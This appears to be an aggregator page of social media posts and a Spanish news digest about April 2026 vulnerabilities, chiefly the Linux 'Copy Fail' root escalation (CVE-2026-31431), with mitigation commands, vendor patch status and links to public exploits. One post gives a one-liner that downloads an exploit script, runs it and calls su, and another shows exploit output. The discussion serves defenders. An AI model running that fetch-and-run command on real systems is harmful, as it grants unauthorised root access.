Overview
Description
Statistics
- 103 Posts
- 522 Interactions
Fediverse
Ooooh, nice:
https://xint.io/blog/copy-fail-linux-distributions
CVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.
Si sois sysadmins de Linux mejor no hagáis planes para el puente... https://copy.fail/
I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.
You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.
https://security-tracker.debian.org/tracker/CVE-2026-31431
https://ubuntu.com/security/CVE-2026-31431
The CopyFail folks shouldn't have routed stderr to /dev/null in their workaround guidance. For some platforms, where it's not a module ... that mitigation is a no-op:
$ rmmod algif_aead
rmmod: ERROR: Module algif_aead is builtin.
So if there's no kernel patch available yet, you can't use that workaround. Instead, use AppArmor / seccomp / SELinux to block unprivileged AF_ALG socket creation if you can (but don't just turn these hardening layers up if they''re not already in place - they can be tricky)
I can confirm this report where Copyfail fails.
https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/19
Copy Fail — CVE-2026-31431
https://copy.fail/
Istheinternetburning ?
this fixed it for me:
cat >/etc/modprobe.d/disable-algif-aead.conf <<'EOF'
install algif_aead /bin/false
blacklist algif_aead
EOF
depmod -a
rmmod algif_aead
i tested with this: https://github.com/rootsecdev/cve_2026_31431
RE: https://hachyderm.io/@petrillic/116489574280084326
I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: https://access.redhat.com/security/cve/cve-2026-31431
Wir checken Eure Linux-Distro! Kommt beim nächsten #DiDay mit euren abgehangenen 5-er Kerneln vorbei und wir halten Händchen, während wir gemeinsam exploit.py von CVE-2026-31431 ausführen.
As people rightly highlight that the #CopyFail fix status in various #Linux distros is… confusing, it’s worth keeping in mind you can deploy the workaround everywhere with no side effects:
# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true
By ‘confusing’ I mean:
- after reading #Ubuntu https://ubuntu.com/security/CVE-2026-31431 I have no idea whether my specific distro is vulnerable or not (WTF are these
linux-hwecode names, mylsb_releasejust saysUbuntu) - Amazon Linux is at least quite open about ‘fix pending’ https://explore.alas.aws.amazon.com/CVE-2026-31431.html
Mitigation to #CVE_2026_31431 / #copyfail :
- If kernel config has CONFIG_CRYPTO_USER_API_AEAD=m:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf; sudo rmmod algif_aead
- If kernel config has CONFIG_CRYPTO_USER_API_AEAD=y:
Add "initcall_blacklist=algif_aead_init" to the kernel command line and reboot.
⚠️ #Linux: Major Linux distributions are impacted by a Privilege Escalation Vulnerability dubbed "CopyFail" (CVE-2026-31431) which sat undetected since 2017.
A 732-byte Python script allows any user on Linux to become root:
#CopyFail
#LPE
👇
https://www.cyberkendra.com/2026/04/a-732-byte-python-script-can-get-root.html
> If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you're affected.
#CVE-2026-31431
copy.fail (CVE-2026-31431) explained: a small Linux kernel bug with an unusually big blast radius
https://jorijn.com/en/blog/copy-fail-cve-2026-31431-linux-kernel-bug-explained/
Very unfortunate that the fix for CVE-2026-31431 isn't easily backportable, with a new API being added, and then its implementation details changing, since the last LTS (6.12 vs 6.18).
qucik mitigation for the copy.fail linux privilage excalation in case you can't reboot your systems right now:
Step 1:
make sure the algif_aead module is not loaded -> lsmod | grep algif_aead
Step 2:
find /lib/modules/$(uname -r) -iname '*algif_aead*' -print -delete
Local Privilege Escalation in every Linux kernel since 2017
Hopefully no one is sitting on a low-privilege RCE...
The CopyFail announcement and handling is one of the least defender-supporting I think I've ever seen.
Mitigations were extremely thin at launch, and haven't improved much, and are even brittle and misleading:
https://infosec.exchange/@tychotithonus/116490466168316767
They've also largely neglected most of the value of the feedback they're getting from defenders clamoring for useful intel. The GitHub repo is full of feedback about which distros are affected or unaffected ... and a day later, none of it has been used to update the list of affected versions in the main README (except for the RHEL made-up version fix)
And this exchange is painful:
https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/12
"None of us are RH people so it wasn't caught" 😐 You had weeks do basic vetting, or find someone who would help you.
Theori seems to have to have intended this to be a showcase for their product. Instead, it has convinced me that I will never buy anything from them.
Edit: Will Dorman goes into more detail here, 100% agreed:
https://infosec.exchange/@wdormann/116493725294723695
Copy Fail (https://copy.fail/, CVE-2026-31431) is a good reminder why I don’t want to run CI jobs only in containers.
It would be great to get some momentum to https://code.forgejo.org/forgejo/forgejo-actions-feature-requests/issues/4 (microVMs for forgejo actions). At least on bare metal (or nested VMs with nested KVM) this would make things a lot safer. It would also simplify the usage of containers/docker in CI jobs without compromising security, which is kind of a pain with Codeberg Action currently.
On se marre bien aujourd'hui, avec CVE-2026-31431
Et la faille est encore plus drôle qu'il me semble bien que sur RedHat 8 et 9 et leurs cousines, “algif_aead” est compilé en statique bien dur dans le noyau et n'est donc pas un module qu'on peut blacklister en contournement 👌🥳
PSA for sysadmins: https://master.almalinux-org.pages.dev/blog/2026-04-30-cve-2026-31431-copy-fail/
TL;DR anyone with an unpriviledged shell can become root with a small exploit. One mean fucker, so be sure to update ASAP once available if you're within blast radius.
Joker voice: Just wait 'til malicious agents and oberly aggressive users get a load of CVE-2026-31431
Hello
I am here to ruin your day again
https://copy.fail/ / CVE-2026-31431
Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.
#linux #kernel #exploit - I completely missed this one:
https://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/
Privilege escalation on all linux kernels since 2017. And I cannot even see if my current ubuntu kernel has a patch for it...
Gotta sign up on some more security accounts here!
Faille de sécurité dans tous les linux depuis 2017 permettant un accès administrateur depuis n'importe quel compte utilisateur:
https://security-tracker.debian.org/tracker/CVE-2026-31431
https://copy.fail/
$ curl https://copy.fail/exp | python3 && su
This is what I'm pasting into my own linux systems to implement the mitigation #cve_2026_31431 suggested at the #copyfail website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.
f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f
So, copy.fail was found with one hour of AI assistance, and would (according to this article) have earned $500K on the open market not too long ago.
https://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/
I'm no security researcher, but this kind of contradicts all those people who said that the OpenBSD bug that Mythos found (for $20K of compute) was just fancy fuzzing, and the only reason it was there was that nobody was investing 20K in OpenBSD security and the security threat of modern AI was all hype.
Good explanation [1] including "For immediate mitigation" (consistent with most other descriptions on how to immediately prevent the exploit while waiting for your distribution to fix it properly).
Debian security tracker [2].
#cve_2026_31431 #CVE_2026_31431
[1] https://xint.io/blog/copy-fail-linux-distributions
[2] https://security-tracker.debian.org/tracker/CVE-2026-31431
Raspberry Pi folks worried about CVE-2026-31431 'copy fail'.
Add this to the end of the line in /boot/firmware/cmdline.txt
initcall_blacklist=algif_aead_init
Then reboot with sudo systemctl reboot.
Check that it worked with
dmesg | fgrep 'blacklisting initcall algif_aead_init'
expect to see
[ 0.000000] blacklisting initcall algif_aead_init
You're now good against this issue.
A mitigation that worked for me - https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/26
むー?まずいか?
Linuxカーネルの脆弱性「CopyFail (CVE-2026-31431)」をEC2のUbuntu 22.04で実証してみた https://zenn.dev/aeyesec/articles/7e4a1e3c83e81b
So... came home to a proverbial tire fire. CVE-2026-31431
Yay. I am bold and DGAF so I made the call to shut off all login access (a call backed up by my peers shortly after).
Users who don't check their mail, look at status, or check our websites will be sending in 'URGENT' tickets any minute now.
Editing to add:
RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.
Looks like it requires a local user account, with a password set, to exploit, yes?
@fanf42 → lets an unprivileged local user write into the page cache and obtain root
CVE-2026-31431, no score yet at NIST
@chuso Probably worth mentioning the related bug on #Gentoo Bugzilla.
https://bugs.gentoo.org/show_bug.cgi?id=CVE-2026-31431
Looks like @thesamesam is well and truly onto it.
Also for #Debian users, at the moment they're working on fixes: https://security-tracker.debian.org/tracker/CVE-2026-31431
Edit: Nothing seen on the #AlpineLinux front, I guess we'll hear from @alpinelinux in due course.
Toch altijd wel knap wat hackers weten te vinden.
'Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.'
"Copy Fail — CVE-2026-31431"
OhMyDebn 3.6.3 now available with Copy Fail CVE-2026-31431 exploit mitigation, OpenCode 1.14.30, and Aether 4.15.3!
OhMyDebn is a debonair Linux desktop for power users. It gives you the stability of the Debian distro, the ease of use of the Cinnamon desktop, and the power of AI, containers, and virtualization.
I'm not sure if this will help and I haven't been able to test all of these yet (just don't have everything set up for it), but I've tried to put out some detections for #cve-2026-31431 for Wazuh, Auditd and MISP and YARA items.
Mileage will vary on this until it can be tested a bit more thoroughly. Please feel free to drop a PR if you have better updates to what's here.
CVE-2026-31431 #copyfail Tetragon Tracing Policy - Kill unprivileged aead_recvmsg. This is the low-level customization of configuration policies your #Linux EDR should have. Also, watch out for processes running NULL argv https://gist.github.com/cr0nx/3079c57310f01ad89699bda642e0e37e
CopyFail (CVE-2026-31431) — a 732-byte Python script that roots every Linux distro shipped since 2017. 🧵https://x.com/i/status/2049533584097362272
@giggls Verdammt, ja. Das ist die richtige ID:
https://euvd.enisa.europa.eu/vulnerability/CVE-2026-31431
Die Bezeichnungen bei den Europäern sind irritierend. Warum müssen die eigene Nummern vergeben?
"EUVD-2026-24639"
@fooflington ich bins grade.
https://security-tracker.debian.org/tracker/CVE-2026-31431
Einfach mal nen poc (nicht überprüft) raushauen ohne responsible disclosure fürn maximalen fame um den eigenen KI scanner zu promoten.
so what do I even do at this point. the patch for CVE-2026-31431 isn't out yet on debian stable and the only fixes I see are to recompile the kernel which I have zero idea how to do
[VULN] ⚠️"Copy Fail - Une IA trouve la faille Linux que personne n'a vue"
" * Copy Fail (CVE-2026-31431) est une faille Linux qui permet de passer de simple utilisateur à root en 732 octets, affectant la quasi-totalité des kernels non patchés depuis 2017, découverte par une IA en une heure.
- La faille exploite une optimisation de 2017 dans le sous-système crypto qui laisse un fichier en lecture seule accessible en zone modifiable, permettant de modifier progressivement un binaire système via l'appel splice().
- Deux solutions de protection existent : patcher le kernel via la distro ou désactiver le module algif_aead (ou bloquer le sous-système crypto via seccomp si le module est intégré en dur)."👇 https://korben.info/copy-fail-faille-kernel-linux-decouverte-ia.html
Demo / exploit ( via @bortzmeyer )
👇
https://www.bortzmeyer.org/copyfail.html
🔍
⬇️
https://vulnerability.circl.lu/vuln/CVE-2026-31431
Copy Fail (CVE-2026-31431): 732 bajty do przejęcia kontroli nad systemem ( https://nfsec.pl/security/6718 ) #linux #kernel #exploit
Can someone explain to me why #copyfail was still unpatched on so many distros this morning when the blog post claims it was reported over a month ago to the kernel security team?
linux kernel question regarding #copyfail CVE-2026-31431 I just tested a c version of the exploit (https://github.com/tgies/copy-fail-c) on a riscv64 linux 5.10.4 (milkv-duo) and get
```
[+] target: /bin/su
[+] payload: 2064 bytes (516 iterations)
socket(AF_ALG): Address family not supported by protocol
patch_chunk failed at offset 0
```
I tested it on another risc64 SBC with a newer kernel which gained root but it seems like the exploit doesn't work on this kernel.
copy-fail-CVE-2026-31431/copy_fail_exp.py at main · theori-io/copy-fail-CVE-2026-31431 · GitHub
https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
@hillu@infosec.exchange It is my understanding that this will not work. There is a published exploit (https://github.com/rootsecdev/cve_2026_31431/blob/main/exploit_cve_2026_31431.py) that messes with the page cache for /etc/passwd to simply show your user id as 0, so a normal call to su will make you root.
@ubuntu Can you share when the updated packages to mitigate #CVE202631431 are likely to drop?
Copy-fail: local privilege escalation in every Linux distro since 2017.
It is local, but shockingly easy to exploit.
Exploit: https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
HackerNews: https://news.ycombinator.com/item?id=47952181
So... dealing with CVE-2026-31431 and I'm annoyed:
- I see vulnerable kernel versions in Debian, but MY kernel (as "uname -sr" tells me) is different
- yet my kernel on the system I tested was clearly faulty, as the exploit worked (and then didn't work when I employed the workaround)
So I need this workaround at least for now until a new kernel comes out (and I probably still won't let algif_aead insert after that anyway)
En las últimas 24 horas se han detectado vulnerabilidades críticas que afectan sistemas Linux, cPanel, routers de Solana y Adobe Acrobat, exponiendo a usuarios a escalada de privilegios, suplantación de autenticación, robo de tokens y ejecución remota de código; además, se reportan fallos en Cloudflare y un malware avanzado que amenaza sectores científicos. Descubre estos y más detalles en el siguiente listado de noticias sobre seguridad informática:
🗞️ ÚLTIMAS NOTICIAS EN SEGURIDAD INFORMÁTICA 🔒
====| 🔥 LO QUE DEBES SABER HOY 30/04/26 📆 |====
🔒 COPY FAIL — 732 BYTES TO ROOT
Se ha descubierto una vulnerabilidad crítica en Linux (CVE-2026-31431) que permite escalar privilegios a nivel root sin riesgo de condiciones de carrera ni necesidad de usar offsets. Esta falla evade las herramientas de integridad de archivos en disco y afecta incluso a entornos aislados como contenedores, representando un riesgo grave para la seguridad de sistemas Linux. Detectada por Xint Code, es esencial actualizar y proteger su infraestructura cuanto antes. Descubre más sobre esta vulnerabilidad y su impacto aquí 👉 https://djar.co/3ckGrI
🌐 LA INTERNET ESTÁ CAYENDO, CAYENDO, CAYENDO (CVE-2026-41940 EN CPANEL Y WHM)
Una falla de suplantación de autenticación ha sido identificada en cPanel y WHM, dos herramientas clave para la gestión de hosting. Esta vulnerabilidad permite a atacantes no autenticados obtener sesiones de usuario, inclusive con privilegios de administrador root, mediante un bypass completo en la autenticación. La amenaza compromete la seguridad de miles de servidores web, por lo que se recomienda aplicar los parches disponibles de inmediato. Infórmate sobre cómo proteger tus sistemas aquí 👉 https://djar.co/ScQtAV
🔗 VULNERABILIDAD EN EL ROUTER DE SOLANA
Importantes fallos de seguridad han sido detectados en el enrutador de la red Solana, facilitando el drenaje de cuentas de tokens y poniendo en riesgo la integridad de las transacciones financieras dentro de esta blockchain. Estas vulnerabilidades críticas podrían comprometer fondos y confianza en la plataforma, por lo que es imprescindible que los usuarios y desarrolladores tomen medidas urgentes para mitigar estos riesgos. Detalles y recomendaciones aquí 👉 https://djar.co/2clAA
📄 TRES VULNERABILIDADES EN ADOBE ACROBAT QUE COMPROMETEN SEGURIDAD
Adobe ha revelado tres vulnerabilidades críticas (CVE-2026-34621, CVE-2026-34622, CVE-2026-34626) que permiten la ejecución remota de código y la filtración de información mediante archivos PDF maliciosos. Estos fallos afectan versiones populares como Acrobat DC y Reader DC, poniendo en riesgo a millones de usuarios que manejan documentos digitales. Actualizar a la última versión es fundamental para evitar intrusiones y pérdidas de datos. Conoce los detalles y actualizaciones disponibles aquí 👉 https://djar.co/Rvvu5
🏛️ LA ESTRATEGIA DEL CONGRESO CONTRA BLOQUEOS MASIVOS DE IP POR LALIGA
El Congreso ha aprobado una reforma a la Ley de Servicios Digitales para evitar bloqueos masivos de direcciones IP que afecten a páginas ajenas en procesos contra la piratería, buscando un equilibrio entre la protección de derechos y la seguridad en internet. Esta medida evita que resoluciones judiciales derriben sitios web de terceros y promueve un entorno digital más seguro y regulado. Entiende el alcance y las implicaciones de esta reforma aquí 👉 https://djar.co/8dbV
☁️ VULNERABILIDADES CRÍTICAS EN LA IMPLEMENTACIÓN DE CLOUDFLARE
Se han reportado vulnerabilidades en los proxies de autorización y archivos PAC alojados por Cloudflare que afectan la gestión de políticas de seguridad de identidad sin necesidad de clientes en dispositivos finales. Estas fallas, aunque técnicas, representan un avance en cómo se protegen las redes y requieren atención para evitar posibles explotaciones. Mantente informado sobre cómo estas vulnerabilidades impactan la seguridad del entorno web aquí 👉 https://djar.co/Y6uR
🐛 DETECTANDO LA AMENAZA DEL MALWARE FAST16
Un malware avanzado, posiblemente desarrollado o patrocinado por un estado, ha sido identificado causando sabotajes discretos mediante la manipulación de programas matemáticos y simulaciones físicas. Esta amenaza tiene potencial para generar fallos graves, afectando sectores científicos y tecnológicos sensibles. La detección y respuesta temprana son claves para mitigar el daño. Aprende cómo proteger tus sistemas frente a Fast16 aquí 👉 https://djar.co/CN8X
Bluesky
Overview
- cPanel
- cPanel
Description
Statistics
- 22 Posts
- 66 Interactions
Fediverse
An authentication bypass security issue has been identified in the cPanel software (including DNSOnly) affecting all versions after 11.40.
This one is ugly, folks. Go update your servers now, and run the detection script.
🚨 CRITICAL auth bypass in cPanel & WHM (CVE-2026-41940, CVSS 9.3) lets unauthenticated attackers access the control panel. Patch not confirmed — restrict interface to trusted IPs & monitor advisories. https://radar.offseq.com/threat/cve-2026-41940-cwe-306-missing-authentication-for--3aceec8f #OffSeq #cPanel #Vulnerability #Infosec
En las últimas 24 horas se han detectado vulnerabilidades críticas que afectan sistemas Linux, cPanel, routers de Solana y Adobe Acrobat, exponiendo a usuarios a escalada de privilegios, suplantación de autenticación, robo de tokens y ejecución remota de código; además, se reportan fallos en Cloudflare y un malware avanzado que amenaza sectores científicos. Descubre estos y más detalles en el siguiente listado de noticias sobre seguridad informática:
🗞️ ÚLTIMAS NOTICIAS EN SEGURIDAD INFORMÁTICA 🔒
====| 🔥 LO QUE DEBES SABER HOY 30/04/26 📆 |====
🔒 COPY FAIL — 732 BYTES TO ROOT
Se ha descubierto una vulnerabilidad crítica en Linux (CVE-2026-31431) que permite escalar privilegios a nivel root sin riesgo de condiciones de carrera ni necesidad de usar offsets. Esta falla evade las herramientas de integridad de archivos en disco y afecta incluso a entornos aislados como contenedores, representando un riesgo grave para la seguridad de sistemas Linux. Detectada por Xint Code, es esencial actualizar y proteger su infraestructura cuanto antes. Descubre más sobre esta vulnerabilidad y su impacto aquí 👉 https://djar.co/3ckGrI
🌐 LA INTERNET ESTÁ CAYENDO, CAYENDO, CAYENDO (CVE-2026-41940 EN CPANEL Y WHM)
Una falla de suplantación de autenticación ha sido identificada en cPanel y WHM, dos herramientas clave para la gestión de hosting. Esta vulnerabilidad permite a atacantes no autenticados obtener sesiones de usuario, inclusive con privilegios de administrador root, mediante un bypass completo en la autenticación. La amenaza compromete la seguridad de miles de servidores web, por lo que se recomienda aplicar los parches disponibles de inmediato. Infórmate sobre cómo proteger tus sistemas aquí 👉 https://djar.co/ScQtAV
🔗 VULNERABILIDAD EN EL ROUTER DE SOLANA
Importantes fallos de seguridad han sido detectados en el enrutador de la red Solana, facilitando el drenaje de cuentas de tokens y poniendo en riesgo la integridad de las transacciones financieras dentro de esta blockchain. Estas vulnerabilidades críticas podrían comprometer fondos y confianza en la plataforma, por lo que es imprescindible que los usuarios y desarrolladores tomen medidas urgentes para mitigar estos riesgos. Detalles y recomendaciones aquí 👉 https://djar.co/2clAA
📄 TRES VULNERABILIDADES EN ADOBE ACROBAT QUE COMPROMETEN SEGURIDAD
Adobe ha revelado tres vulnerabilidades críticas (CVE-2026-34621, CVE-2026-34622, CVE-2026-34626) que permiten la ejecución remota de código y la filtración de información mediante archivos PDF maliciosos. Estos fallos afectan versiones populares como Acrobat DC y Reader DC, poniendo en riesgo a millones de usuarios que manejan documentos digitales. Actualizar a la última versión es fundamental para evitar intrusiones y pérdidas de datos. Conoce los detalles y actualizaciones disponibles aquí 👉 https://djar.co/Rvvu5
🏛️ LA ESTRATEGIA DEL CONGRESO CONTRA BLOQUEOS MASIVOS DE IP POR LALIGA
El Congreso ha aprobado una reforma a la Ley de Servicios Digitales para evitar bloqueos masivos de direcciones IP que afecten a páginas ajenas en procesos contra la piratería, buscando un equilibrio entre la protección de derechos y la seguridad en internet. Esta medida evita que resoluciones judiciales derriben sitios web de terceros y promueve un entorno digital más seguro y regulado. Entiende el alcance y las implicaciones de esta reforma aquí 👉 https://djar.co/8dbV
☁️ VULNERABILIDADES CRÍTICAS EN LA IMPLEMENTACIÓN DE CLOUDFLARE
Se han reportado vulnerabilidades en los proxies de autorización y archivos PAC alojados por Cloudflare que afectan la gestión de políticas de seguridad de identidad sin necesidad de clientes en dispositivos finales. Estas fallas, aunque técnicas, representan un avance en cómo se protegen las redes y requieren atención para evitar posibles explotaciones. Mantente informado sobre cómo estas vulnerabilidades impactan la seguridad del entorno web aquí 👉 https://djar.co/Y6uR
🐛 DETECTANDO LA AMENAZA DEL MALWARE FAST16
Un malware avanzado, posiblemente desarrollado o patrocinado por un estado, ha sido identificado causando sabotajes discretos mediante la manipulación de programas matemáticos y simulaciones físicas. Esta amenaza tiene potencial para generar fallos graves, afectando sectores científicos y tecnológicos sensibles. La detección y respuesta temprana son claves para mitigar el daño. Aprende cómo proteger tus sistemas frente a Fast16 aquí 👉 https://djar.co/CN8X
Bluesky
Overview
- GitHub
- Enterprise Server
Description
Statistics
- 11 Posts
- 86 Interactions
Fediverse
With Microsoft pushing AI slop & bots hard into every product without any verification and accountability I am not surprised bug like this now exists. Critical GitHub RCE bug exposed millions of repositories including private one that business users like to keep their code private. GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance https://nvd.nist.gov/vuln/detail/CVE-2026-3854
@ben @jpmens Yes,; executing commands with parameters given by the user, without any escaping. https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Uh… this seems bad https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Bluesky
Overview
Description
Statistics
- 7 Posts
- 3 Interactions
Fediverse
LiteLLM-Sicherheitslücke CVE-2026-42208: SQL-Injection binnen 36 Stunden nach Veröffentlichung aktiv ausgenutzt
This is the issue with AI in criminal hands. Speed to market.
https://thehackernews.com/2026/04/litellm-cve-2026-42208-sql-injection.html?m=1
Bluesky
Overview
Description
Statistics
- 4 Posts
- 1 Interaction
Bluesky
Overview
Description
Statistics
- 1 Post
- 2 Interactions
Fediverse
CERT/CC issued advisory VU#915947 for SGLang (an AI inference server), CVE-2026-5760, severity 9.8. A poisoned GGUF model file carries a chat-template that SGLang renders through Jinja2 with no sandbox. Arbitrary Python runs on the host. Same root cause as llama-cpp-python (2024) and vLLM (2025). Sandboxed Jinja2 existed the whole time and three frameworks left the line untouched. Any GGUF you did not build yourself runs code on load.
Overview
- TUBITAK BILGEM Software Technologies Research Institute
- Pardus Software Center
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
🚩 CRITICAL: CVE-2026-5166 in Pardus Software Center <1.0.3 enables path traversal — attackers may access/modify files outside restricted dirs. No patch yet. Restrict access, monitor updates. https://radar.offseq.com/threat/cve-2026-5166-cwe-22-improper-limitation-of-a-path-67023af4 #OffSeq #Vuln #Pardus #Infosec
Overview
- thymeleaf
- thymeleaf
Description
Statistics
- 1 Post
- 3 Interactions
Bluesky
Overview
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
RE: https://mastodon.bsd.cafe/@grahamperrin/116475400039936346
3/
CVE-2026-7270 <https://www.cve.org/CVERecord?id=CVE-2026-7270> FreeBSD-SA-26:13.exec <https://security.freebsd.org/advisories/FreeBSD-SA-26:13.exec.asc> credited to Ryan of Calif.io.
Calif is recently known for post-CVE attention to an earlier CVE, <https://blog.calif.io/p/mad-bugs-claude-wrote-a-full-freebsd>. This work by Calif was wrongly attributed to Nicholas Carlini (an error by Devansh in 'Artificial Intelligence Made Simple').
Overview
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
@thesaigoneer thanks!
Looking at the various credits …
1/
CVE-2026-35547 <https://www.cve.org/CVERecord?id=CVE-2026-35547> FreeBSD-SA-26:17.libnv <https://security.freebsd.org/advisories/FreeBSD-SA-26:17.libnv.asc> credited to Mariusz Zaborski.
<https://papers.freebsd.org/author/mariusz-zaborski/> is currently empty (<https://github.com/freebsd/freebsd-papers/issues/152> relates), should probably comprise:
<https://papers.freebsd.org/2016/asiabsdcon/oshogbo-capsicum_and_casper/>
<https://papers.freebsd.org/2019/bsdcan/zaborski-building_a_security_appliance_based_on_freebsd/>